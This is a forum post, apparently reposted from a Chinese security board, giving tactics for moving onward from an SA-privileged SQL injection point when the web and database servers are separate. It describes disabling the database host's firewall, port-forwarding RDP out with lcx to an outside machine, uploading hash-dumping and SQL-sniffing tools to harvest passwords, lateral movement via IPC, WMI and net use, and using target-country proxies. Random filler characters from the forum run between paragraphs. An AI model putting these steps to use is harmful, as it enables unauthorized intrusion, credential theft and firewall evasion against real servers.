中国网络渗透测试联盟
标题:
SA权限网站和数据库分离的一些思路
[打印本页]
作者:
admin
时间:
2013-2-16 21:46
标题:
SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
) ^% M- V4 N/ S! L8 |
" N/ k1 m$ l( m8 x
% w* w+ m+ e) s" Z* \
# h3 A; j! E5 v+ Z" {! C7 o( S, |7 [
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
; P m" t) i) C, k
3 w1 F& M! R, x: p. Y$ B. t
, Q8 {8 {' F5 J5 e3 ?
一、DB机有公网IP.
. e, `& p# M; V* ^# P
4 f/ u9 n% |5 _. y. S
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
2 D1 \# Z7 f4 D) v: E4 v
& d6 C9 u; `5 d* o! D! o% |* }: J
0 z+ o' ?: ]! p6 j3 C5 ]
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
. I* Y9 L, U0 ^- k
5 @( W1 `: x) A
; K4 @8 p/ [+ N' N1 b5 E4 T
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍.
www.2cto.com
; E& ^* L' b" X2 E# k
3 p" l7 C1 |4 [4 b6 w4 D
6 H$ N. E: K$ c7 A ~% j
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
5 a, G7 e1 G% F0 w3 v" g& Q
+ {. J7 y+ ~" A& h2 h" f6 R
* Q- C: S: p1 m( x9 |& h# j* L2 q
0 ^8 V1 [5 O% j a$ f( r6 u
二、DB机只有内网IP
9 T/ O) g. Z8 Q$ k' ?" D% G9 ?
. \: [% N: O: t T
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心
, 拿密码尝试登陆web后台等.
) \+ v- k O3 }
N$ G! \' P3 F. G/ g+ g6 I
) @( q2 f6 O z, u) B9 j4 D9 D* H
2:停掉防火墙和IP策略再从内往外扫描.
$ v: g+ i; @ t& ]% Z4 d
" S! R( ~0 F$ _1 Y, \* B3 Y
2 i/ k/ [5 ^6 R% l& H" ]% }* K
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
" Q" O- `: q& Z/ X
) J7 Q# b( v$ }# d/ b6 u! Y e
- i0 Z2 `) S7 i- a8 b
4:学会密码规律分析往往会有惊喜.
: X% m, c4 d( X9 B
. a% y$ T6 L2 a. T/ u
! u2 V0 Y% H& y4 d p
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
3 o* G5 t6 l! u% S+ o
4 F+ a. P- N( i$ y$ T
* n) i9 i! m8 y
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2